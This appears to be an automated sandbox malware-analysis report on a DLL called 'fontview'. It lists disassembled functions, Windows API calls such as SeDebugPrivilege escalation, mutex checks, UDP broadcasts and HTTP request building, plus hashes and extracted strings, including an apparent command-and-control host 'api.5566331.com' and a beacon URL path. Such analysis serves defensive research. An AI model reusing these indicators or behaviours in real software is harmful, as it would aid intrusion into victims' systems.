                                                      • Opcode ID: 1747b20f197bfeb9091966adac114b40a9d636083f5a557c6abb1ab39a3ab58b
                                                      • Instruction ID: f90d9264f1c1e6498c44510829453a28db1729ed47331b4b3d70f0524b460866
                                                      • Opcode Fuzzy Hash: 1747b20f197bfeb9091966adac114b40a9d636083f5a557c6abb1ab39a3ab58b
                                                      • Instruction Fuzzy Hash: 3B02D570910199AEEB19CB74CC45FEEBBB9EF46340F0441ACE406DB196DB70AE85CB60

                                                      Control-flow Graph

                                                      APIs
                                                      • OutputDebugStringA.KERNEL32(---------------->is null!!!!!!!!!!!!!!!!), ref: 1001A9EB
                                                      • CreateMutexA.KERNEL32(00000000,00000000,null1), ref: 1001A9FA
                                                      • Sleep.KERNEL32(000001F4,00000069,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001AB66
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001A91C,00000000,00000000,?), ref: 1001AB89
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 1001ABD0
                                                      • CloseHandle.KERNEL32 ref: 1001ABD8
                                                      • ReleaseMutex.KERNEL32 ref: 1001ABE0
                                                      • CloseHandle.KERNEL32 ref: 1001ABE8
                                                      • Sleep.KERNEL32(000001F4), ref: 1001AC02
                                                      • TerminateThread.KERNEL32(00000230,00000000), ref: 1001AC13
                                                      • CloseHandle.KERNEL32 ref: 1001AC1F
                                                        • Part of subcall function 1001B976: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
                                                        • Part of subcall function 1001B976: GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
                                                        • Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
                                                        • Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9
                                                        • Part of subcall function 1001C2A5: GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
                                                        • Part of subcall function 1001C2A5: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
                                                        • Part of subcall function 1001C2A5: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
                                                        • Part of subcall function 1001C2A5: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
                                                        • Part of subcall function 1001C2A5: CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle_malloc$CreateMutex$ProcessReleaseSleepThreadToken$AdjustCurrentDebugErrorFileLastLookupMappingOpenOutputPrivilegePrivilegesStringTerminateValue__vsnprintf_s_memmove
                                                      • String ID: ->FILE_APP mutex is existing$ ->FILE_APP today is runing$---------------->is null!!!!!!!!!!!!!!!!$555prc4xnupd$CheckApp:%d text:%s$Input param:%s$get:%s$null1
                                                      • API String ID: 3952390217-1909696795
                                                      • Opcode ID: 280b496bb56ebac9d35dd4fced43be9eab9cfee4624935922c9607c6b1f76cc6
                                                      • Instruction ID: b9528a95e4524d17b4f6d8a13efaef8769615a14464e7c918a77bf7d60e1a239
                                                      • Opcode Fuzzy Hash: 280b496bb56ebac9d35dd4fced43be9eab9cfee4624935922c9607c6b1f76cc6
                                                      • Instruction Fuzzy Hash: 3B61F475504350AFE710EF25CC89EAF7BE9EF85350F00052EF545961A2DB70EA84CBA2

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10015714
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 100157C1
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015839
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10015843
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001586A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1001586E
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 10015899
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 100158AE
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158B5
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158CA
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158D8
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E0
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
                                                      • String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.dg7983%1io$gnbc344asd$m
                                                      • API String ID: 2639461599-1078873301
                                                      • Opcode ID: 32efccec15df40e9f32f2101961871b350cb3ef953033ed113608a976098ee04
                                                      • Instruction ID: db7850e3fd9d69c0528ec08768e9ac04465b1e639cfc869010542aedb86768d4
                                                      • Opcode Fuzzy Hash: 32efccec15df40e9f32f2101961871b350cb3ef953033ed113608a976098ee04
                                                      • Instruction Fuzzy Hash: F0615FB1D00228EFEB11DFA4CC91ADEB7BDFF18250F54406AE506A7152DB70AA84CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 919 1001d388-1001d3b1 920 1001d6c0-1001d6d6 919->920 921 1001d3b7-1001d412 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 919->921 934 1001d418 921->934 935 1001d6ae-1001d6bb call 10001d92 * 2 921->935 936 1001d41b-1001d438 call 100169ae socket 934->936 935->920 942 1001d44a-1001d4e5 htons setsockopt * 3 sendto 936->942 943 1001d43a-1001d445 WSAGetLastError 936->943 942->943 945 1001d4eb-1001d50e call 10039700 942->945 944 1001d69e-1001d6a8 Sleep 943->944 944->935 944->936 948 1001d514-1001d54e call 10039700 recvfrom 945->948 949 1001d676-1001d699 closesocket 945->949 952 1001d670 WSAGetLastError 948->952 953 1001d554-1001d564 inet_ntoa 948->953 949->944 952->949 954 1001d567-1001d56c 953->954 954->954 955 1001d56e-1001d573 954->955 956 1001d579-1001d590 955->956 957 1001d658-1001d668 Sleep 955->957 958 1001d591-1001d595 956->958 957->948 959 1001d66e 957->959 960 1001d597-1001d599 958->960 961 1001d5af-1001d5b1 958->961 959->949 962 1001d5ab-1001d5ad 960->962 963 1001d59b-1001d5a1 960->963 964 1001d5b4-1001d5b6 961->964 962->964 963->961 965 1001d5a3-1001d5a9 963->965 964->957 966 1001d5bc-1001d5d0 964->966 965->958 965->962 967 1001d5d2 966->967 968 1001d61a-1001d653 call 10001d63 call 10008baf call 10001d92 966->968 970 1001d5d4-1001d5dd 967->970 968->957 972 1001d5e1 970->972 973 1001d5df 970->973 975 1001d5e5-1001d5e9 972->975 973->972 977 1001d605-1001d607 975->977 978 1001d5eb-1001d5ed 975->978 981 1001d60a-1001d60c 977->981 979 1001d601-1001d603 978->979 980 1001d5ef-1001d5f5 978->980 979->981 980->977 983 1001d5f7-1001d5ff 980->983 984 1001d655 981->984 985 1001d60e-1001d618 981->985 983->975 983->979 984->957 985->968 985->970
                                                      APIs
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001D429
                                                      • WSAGetLastError.WS2_32 ref: 1001D43A
                                                      • htons.WS2_32(?), ref: 1001D457
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 1001D47C
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001D49C
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001D4B4
                                                      • sendto.WS2_32(00000000,?,?,00000000,000000FF,00000010), ref: 1001D4DC
                                                      • recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001D545
                                                      • inet_ntoa.WS2_32(?), ref: 1001D558
                                                      • Sleep.KERNEL32(0000000A), ref: 1001D65A
                                                      • closesocket.WS2_32(00000000), ref: 1001D693
                                                      • Sleep.KERNELBASE(000003E8), ref: 1001D69E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$Sleep$ErrorLast_memmoveclosesockethtonsinet_ntoarecvfromsendtosocket
                                                      • String ID: req$res
                                                      • API String ID: 3206013018-3551752921
                                                      • Opcode ID: c606c7f4e31491b364e443341f0c510239e8ca9e0761373d92bec0b92cf65dcb
                                                      • Instruction ID: f0e5c5a51288f6555a9495399a3376c632556063d47a78e4a63fd70f32be9dbf
                                                      • Opcode Fuzzy Hash: c606c7f4e31491b364e443341f0c510239e8ca9e0761373d92bec0b92cf65dcb
                                                      • Instruction Fuzzy Hash: 9B91D472108781AFE310EF24CC85BAABBE9EF49354F00461AF585CB1D1DB71E989CB52

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1026 1000dd2b-1000dd96 call 1004eb10 call 10039700 * 2 call 10033c98 1035 1000e029-1000e055 GetLastError call 1000c213 call 10035368 1026->1035 1036 1000dd9c-1000ddb9 call 10033eba 1026->1036 1045 1000e057-1000e05a 1035->1045 1046 1000e05c 1035->1046 1042 1000ddbc-1000ddc1 1036->1042 1042->1042 1044 1000ddc3-1000ddc8 1042->1044 1047 1000e005-1000e016 call 1000191f call 10001f26 1044->1047 1048 1000ddce-1000de13 1044->1048 1049 1000e05f-1000e090 call 10015c63 call 1000c266 call 10009643 call 1001c12c 1045->1049 1046->1049 1063 1000e01b-1000e024 call 10033fd2 1047->1063 1050 1000de34-1000de44 1048->1050 1051 1000de15-1000de32 call 10036dd0 1048->1051 1084 1000e095-1000e0a7 call 10004766 * 2 1049->1084 1056 1000de45-1000de48 1050->1056 1051->1056 1057 1000dea2-1000df78 call 10033afd call 100344ab call 10034410 call 100344ab call 10032fed call 1000191f call 10001f26 1056->1057 1058 1000de4a-1000de8c call 10001f26 1056->1058 1116 1000df7a-1000df7d 1057->1116 1117 1000dfdb 1057->1117 1071 1000de97-1000de9d call 10001d92 1058->1071 1072 1000de8e-1000de92 call 10001e92 1058->1072 1077 1000e0ac-1000e0b0 1063->1077 1071->1057 1072->1071 1081 1000e0b6-1000e0d2 call 10033c98 1077->1081 1082 1000e169 1077->1082 1094 1000e153-1000e164 call 1000191f call 10001f26 1081->1094 1095 1000e0d4-1000e0f8 call 10034410 call 10011419 1081->1095 1085 1000e16b-1000e183 call 10001d92 1082->1085 1084->1077 1094->1082 1109 1000e0fa 1095->1109 1110 1000e0fc-1000e100 1095->1110 1109->1110 1112 1000e102 1110->1112 1113 1000e104-1000e12c call 10032fed call 10001d92 1110->1113 1112->1113 1128 1000e12f-1000e134 1113->1128 1116->1117 1120 1000df7f-1000df82 1116->1120 1119 1000dfdd 1117->1119 1122 1000dfe0-1000dfe4 1119->1122 1120->1117 1123 1000df84-1000df9e call 10011419 1120->1123 1125 1000dff1-1000dff5 1122->1125 1126 1000dfe6-1000dfec call 10001d92 1122->1126 1133 1000dfa0 1123->1133 1134 1000dfa2 1123->1134 1125->1063 1131 1000dff7-1000e000 call 10033fd2 1125->1131 1126->1125 1128->1128 1132 1000e136-1000e151 call 10034adc call 10033fd2 1128->1132 1131->1085 1132->1082 1133->1134 1137 1000dfa8-1000dfac 1134->1137 1140 1000dfca-1000dfcf 1137->1140 1141 1000dfae-1000dfb0 1137->1141 1142 1000dfd1-1000dfd3 1140->1142 1144 1000dfb2-1000dfb8 1141->1144 1145 1000dfc4-1000dfc8 1141->1145 1142->1119 1147 1000dfd5-1000dfd9 1142->1147 1144->1140 1146 1000dfba-1000dfc2 1144->1146 1145->1142 1146->1137 1146->1145 1147->1122
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000DD30
                                                        • Part of subcall function 10033C98: __fsopen.LIBCMT ref: 10033CA3
                                                      • __fread_nolock.LIBCMT ref: 1000DDAB
                                                      • _memmove.LIBCMT ref: 1000DE27
                                                      • __localtime64.LIBCMT ref: 1000DEBE
                                                      • __time64.LIBCMT ref: 1000DEE7
                                                      • __localtime64.LIBCMT ref: 1000DEFF
                                                        • Part of subcall function 100344AB: __gmtime64_s.LIBCMT ref: 100344BE
                                                      • _sprintf.LIBCMT ref: 1000DF50
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • GetLastError.KERNEL32(?,?,?,10006588,?,00000000), ref: 1000E029
                                                      • __time64.LIBCMT ref: 1000E0D5
                                                      • _sprintf.LIBCMT ref: 1000E113
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog__localtime64__time64_sprintf$ErrorLast__fread_nolock__fsopen__gmtime64_s_memmove
                                                      • String ID: %d-%s-%s$File time update faild,can't create file.$O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s$time file is null
                                                      • API String ID: 1195966642-4095322339
                                                      • Opcode ID: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
                                                      • Instruction ID: 3c64a6cba0836d90df9f4256677c0f3f46e6d179118a5539ab0e8369d48d467e
                                                      • Opcode Fuzzy Hash: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
                                                      • Instruction Fuzzy Hash: D6D1B675D04249EFEB15DFA4CC91EEEB7B9EF05340F1040AAE509AB191DB31AE49CB60

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1149 1001e1a7-1001e1b8 1150 1001e1c2-1001e1c4 1149->1150 1151 1001e1ba-1001e1bf closesocket 1149->1151 1152 1001e1c6-1001e1ca closesocket 1150->1152 1153 1001e1cc-1001e1cf 1150->1153 1151->1150 1152->1153 1154 1001e1d1-1001e1d6 closesocket 1153->1154 1155 1001e1d9-1001e1ea 1153->1155 1154->1155 1156 1001e205-1001e208 1155->1156 1157 1001e1ec-1001e202 Sleep TerminateThread CloseHandle 1155->1157 1158 1001e223-1001e226 1156->1158 1159 1001e20a-1001e220 Sleep TerminateThread CloseHandle 1156->1159 1157->1156 1160 1001e241-1001e244 1158->1160 1161 1001e228-1001e23e Sleep TerminateThread CloseHandle 1158->1161 1159->1158 1162 1001e246-1001e25c Sleep TerminateThread CloseHandle 1160->1162 1163 1001e25f-1001e274 Sleep 1160->1163 1161->1160 1162->1163
                                                      APIs
                                                      • closesocket.WS2_32(?), ref: 1001E1BD
                                                      • closesocket.WS2_32(?), ref: 1001E1C8
                                                      • closesocket.WS2_32(?), ref: 1001E1D4
                                                      • Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                      • Sleep.KERNELBASE ref: 1001E26F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$CloseHandleTerminateThread$closesocket
                                                      • String ID:
                                                      • API String ID: 3830272782-0
                                                      • Opcode ID: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
                                                      • Instruction ID: bc42b57c38fdf492546c018e19de88c484626926c77996ddfbf50983c1e4f3a2
                                                      • Opcode Fuzzy Hash: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
                                                      • Instruction Fuzzy Hash: 5121B830500B95AFD761AF36CC88B1ABBE5FF48749F11482DE186969A0D7B1E890CF14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1164 1000246e-10002550 call 1004eb10 call 1001a146 call 10001d63 call 1001a61c call 10001d92 call 10001e92 call 1001a65f call 10001d92 call 10001d63 call 10033afd call 10017a05 1325 10002552 call 1001a0f8 1164->1325 1326 10002552 call 1001a36c 1164->1326 1187 10002555-1000255d 1188 100028e2-10002900 WSAGetLastError call 1001a6bd 1187->1188 1189 10002563-10002756 call 1001a6bd call 1000191f call 10003256 call 1000191f call 10003256 call 1001a6bd call 10002f31 call 10001d92 call 1001a6a2 call 10002f31 call 10001d92 call 1000191f call 10003256 call 1000191f call 10003256 call 10001d63 call 10003078 call 100030ed call 10001d63 call 10017a82 call 10001d92 call 10001d63 * 2 call 10017a82 call 10001d63 * 2 call 10017a82 call 10017c93 call 10017cd2 call 10017bf7 1187->1189 1195 10002902 1188->1195 1196 10002904-10002913 call 1000191e 1188->1196 1273 10002778-1000278e call 1000191e 1189->1273 1274 10002758-1000275b 1189->1274 1195->1196 1202 10002919-10002922 call 10001d92 1196->1202 1208 10002924 1202->1208 1209 10002926-1000297a call 1000191e call 10017a55 call 10017a3a call 10001d92 call 1001a1ac call 10001d92 1202->1209 1208->1209 1275 10002791-100027a6 call 1000191f call 10001f26 1273->1275 1274->1275 1276 1000275d-1000276d call 10017bf7 1274->1276 1285 100028ae-100028b2 1275->1285 1282 10002772-10002776 1276->1282 1282->1273 1282->1274 1286 100028b8 1285->1286 1287 100027ab-100027b9 call 10002dbf 1285->1287 1288 100028c2-100028e0 call 10001d92 * 2 1286->1288 1292 1000286c-1000287a 1287->1292 1293 100027bf-100027f9 call 10002e39 call 100338d7 1287->1293 1288->1202 1297 100028aa-100028ac 1292->1297 1298 1000287c-1000288b 1292->1298 1307 100028ba-100028bd call 10001d92 1293->1307 1308 100027ff-10002801 1293->1308 1297->1285 1297->1288 1298->1297 1301 1000288d-1000289e call 10001db3 1298->1301 1301->1297 1306 100028a0-100028a5 call 10001e92 1301->1306 1306->1297 1307->1288 1308->1307 1311 10002807-10002852 call 10002e39 call 10002f31 call 10001d92 call 10001db3 1308->1311 1320 10002854-10002859 call 10001e92 1311->1320 1321 1000285e-1000286a call 10001d92 1311->1321 1320->1321 1321->1285 1325->1187 1326->1187
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002473
                                                        • Part of subcall function 1001A146: _malloc.LIBCMT ref: 1001A17E
                                                        • Part of subcall function 1001A61C: _wprintf.LIBCMT ref: 1001A640
                                                        • Part of subcall function 1001A65F: _wprintf.LIBCMT ref: 1001A683
                                                        • Part of subcall function 10033AFD: __wcstoi64.LIBCMT ref: 10033B10
                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,000000FF,00000000,?,?,?,?,00000001), ref: 100028E2
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                        • Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99
                                                        • Part of subcall function 10003078: __EH_prolog.LIBCMT ref: 1000307D
                                                        • Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
                                                        • Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4
                                                        • Part of subcall function 10017C93: _wprintf.LIBCMT ref: 10017CB7
                                                        • Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017CF2
                                                        • Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017D17
                                                        • Part of subcall function 10017BF7: _wprintf.LIBCMT ref: 10017C1D
                                                      • _swscanf.LIBCMT ref: 100027EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf$H_prolog$_memmove$ErrorLast__wcstoi64_malloc_swscanf
                                                      • String ID: HTTP/1.1$ http://$%d bytes received %s $Accept$Content-type$GET$HTTP readBody data:%s$Host$application/x-www-form-urlencoded$text/plain
                                                      • API String ID: 1397112314-3476068429
                                                      • Opcode ID: 0d0e6fe9f1e92f682e15250806ca41007864c308aafd20128a6335f297059f73
                                                      • Instruction ID: a7634ae425d1516add6669ffa0e6d985a436ae34248816d06a7b430fa3304256
                                                      • Opcode Fuzzy Hash: 0d0e6fe9f1e92f682e15250806ca41007864c308aafd20128a6335f297059f73
                                                      • Instruction Fuzzy Hash: B1E1D235800258EEEB15DBA4CC96FEDB7B8EF11350F50409AE50A77186DF706B88CB62

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000E18B
                                                      • __time64.LIBCMT ref: 1000E1B1
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1000E1BE
                                                      • __time64.LIBCMT ref: 1000E1C7
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 1000E228
                                                        • Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473
                                                      • Sleep.KERNELBASE(niserr), ref: 1000E3FF
                                                      Strings
                                                      • niserr, xrefs: 1000E3ED
                                                      • Make Context:%s,time:%d,rand:%d, xrefs: 1000E427
                                                      • /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld, xrefs: 1000E222
                                                      • hjh~$754jhghj, xrefs: 1000E31E
                                                      • api.5566331.com, xrefs: 1000E255
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
